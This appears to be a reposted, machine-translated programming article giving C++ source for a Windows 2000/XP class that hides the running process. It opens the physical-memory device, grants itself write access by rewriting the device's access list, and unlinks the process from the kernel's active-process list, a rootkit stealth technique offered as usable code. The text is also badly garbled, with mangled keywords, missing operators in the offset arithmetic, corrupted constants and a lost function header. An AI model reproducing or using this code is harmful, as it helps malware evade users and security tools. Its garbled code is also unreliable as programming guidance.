Process hidden class

xiaoxiao2021-04-08  444

The header file is as follows:

class CHideProcss {public: CHideProcss (); BOOL HideProcess (); virtual ~ CHideProcss (); private: BOOL InitNTDLL (); BOOL YHideProcess (); VOID CloseNTDLL (); VOID SetPhyscialMemorySectionCanBeWrited (HANDLE hSection); HANDLE OpenPhysicalMemory (); PVOID Lineartophys (Pulong Baseaddress, Pvoid ​​Addr); Ulong GetData (PVOID ADDR); Bool SetData (PVOID ADDR, ULONG DATA); long __stdcall execption (struct _exception_points * tmp);

}

2. The CPP file is as follows

// hideprocss.cpp: importation of the chideprocss class.// Process hidden program // When you hide hideprocess ///

#I nclude "stdafx.h" #i nclude "hideprocss.h" #i nclude #i nclude #i nclude

#ifdef _debug # undef this_filestatic char this_file [] = __ file __; # Define new debug_new # Endif

#define nt_success (status) (status)> = 0) #define status_info_length_mismatch ((ntstatus) 0xc000000004L) #define status_access_denied ((ntstatus) 0xc0000022L)

TypedEf long NTSTATUS;

Typedef struct _io_status_block {ntstatus status; ulong information;}} }_status_block, * PIO_STATUS_BLOCK;

Typedef struct _unicode_string {ushort length; ushort maximumlength; pwstr buffer;} unicode_string, * punicode_string;

#define OBJ_INHERIT 0x00000002L # define OBJ_PERMANENT 0x00000010L # define OBJ_EXCLUSIVE 0x00000020L # define OBJ_CASE_INSENSITIVE 0x00000040L # define OBJ_OPENIF 0x00000080L # define OBJ_OPENLINK 0x00000100L # define OBJ_KERNEL_HANDLE 0x00000200L # define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES {ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK * ZWOPENSECTION) (OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes);

TypedEf void (Callback * RTLinitUnicodeString) (In Out Punicode_String DestinationString, In Pcwstr SourceString);

RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; OSVERSIONINFO g_osvi; // ------------------------ -------------------------------------------------- - /// CONSTRUCTION / DESTRUCTION / /

Chideprocss :: chideprocss () {

}

ChideProcss :: ~ chideprocss () {

}

BOOL CHideProcss :: InitNTDLL () {g_hNtDLL = LoadLibrary ( "ntdll.dll"); if (NULL == g_hNtDLL) return FALSE; RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress (g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION) GetProcAddress ( G_HNTDLL, "ZWopensection"); return true;} // ------------------------------------ -------------------------------------- Void ChideProcss :: closentdll () {if (null! = g_hntdll) Freelibrary (g_hntdll);

G_HNTDLL = NULL;} // ------------------------------------------- ------------------------------- Void ChideProcss :: setphyscialmemorysectioncanbewrite (handle hsection) {PDACL PDACL = NULL; Psecurity_Descriptor PSD = NULL; PACL pNewDacl = NULL; DWORD dwRes = GetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, & pDacl, NULL, & pSD); if (! ERROR_SUCCESS = dwRes) {if (pSD) LocalFree (pSD); if (pNewDacl) LocalFree (pNewDacl);} EXPLICIT_ACCESS ea; RtlZeroMemory (& ea, sizeof (EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; dwRes = SetEntriesInAcl (1, & ea, pDacl, & pNewDacl); if (! ERROR_SUCCESS = dwRes) {if (pSD) LocalFree (pSD); if (pNewDacl) LocalFree (p NewDacl);} dwRes = SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL); if (ERROR_SUCCESS = dwRes) {if (pSD) LocalFree (pSD);! If (pNewDacl) LocalFree (pNewDacl);} } // ----------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------• DWOSVERSIONFOSIZE = SizeOf (OSVersionInfo); GetversionEx; if (5! = g_osvi.dwmajorversion) Return NULL;

switch (g_osvi.dwMinorVersion) {case 0: PhyDirectory = 0x30000; break; // 2k case 1: PhyDirectory = 0x39000; break; // xp default: return NULL;} RtlInitUnicodeString (& physmemString, L "// Device // PhysicalMemory" ); attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = & physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL; status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE , & attributes); if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes);} if (! NT_SUCCESS) RETURN NULL; G_PMAPPHYSICALMEM iry = mapviewoffile (g_hmpm, file_map_read | file_map_write, 0, phydirectory, 0x1000); if (g_pmapphysicalmemory == null) Return null; return g_hmpm;} // --------------- -------------------------------------------------- -------- Pvoid ​​Chideprocss :: LineArtophys (Pulong Baseaddress, Pvoid ​​Addr) {Ulong Vaddr = (Ulong) Addr, PGDE, PTE, PADDR; PGDE = BaseAddress [VADDR >> 22]; if (0 == (PGDE & 1)) Return 0;

Ulong TMP = PGDE & 0x00000080;

IF (0! = TMP) {paddr = (pgde & 0xffc00000) (VADDR & 0x003FFFFF);} else {pgde = (ulong) MapViewOffile (g_hmpm, 4, 0, pgde & 0xffff000, 0x1000); PTE = ((Pulong) ) Pgde) [(VADDR & 0x003FF000) >> 12]; if (0 == (PTE & 1)) RETURN 0; PADDR = (PTE & 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFf); UnmapViewOffile (PVOID) PGDE);}

Return (Pvoid) Paddr;} // ----------------------------------------- --------------------------------- Ulong Chideprocss :: getData (pvoid addr) {ulong phys = (ulong) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (0 == tmp) return 0; ULONG ret = tmp [(Phys & 0xFFF) >> 2]; UnmapViewOffile (TMP); Return Ret;} // ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------- Bool Chideprocss: : SetData (PVOID addr, ULONG data) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

IF (0 == TMP) Return False;

TMP [(PHYS & 0xFFF) >> 2] = data; unmapViewoffile (TMP);

Return True;} // -------------------------------------------- ------------------------------ long __stdcall chideprocss :: execption (struct _exception_pointers * tmp) {EXITPROCESS (0); Return 1 ;}//--------------------------------------------- ------------------------------ Bool Chideprocss :: YHideProcess () {// setunhandledExceptionFilter (ExecEption);

IF (false == initntdll ()) Return False; if (0 == OpenPhysicalMemory ()) Return False;

Ulong thread = getdata (pvoid) 0xffdff124); // kteb ulong process = getData (pvoid (thread 0x44)); // kpeb

Ulong FW, BW; if (0 == g_osvi.dwminorversion) {fw = getdata (pvoid (Process 0xA0)); bw = getData (PVOID (Process 0xA4));}

IF (1 == g_osvi.dwminorversion) {FW = getData (PVOID (Process 0x88)); bw = getData (PVOID (Process 0x8c));} setData (PVOID (FW 4), BW); setData (PVOID (BW), FW);

CloseHandle (G_HMPM); Closentdll ();

Return True;}

// Hide Process Shows Bool Chideprocss :: HideProcess () {static bool b_hide = false; if (! B_hide) {b_hide = true; yhideprocess (); return true;}

Return True;}

转载请注明原文地址:https://www.9cbs.com/read-132849.html

New Post(0)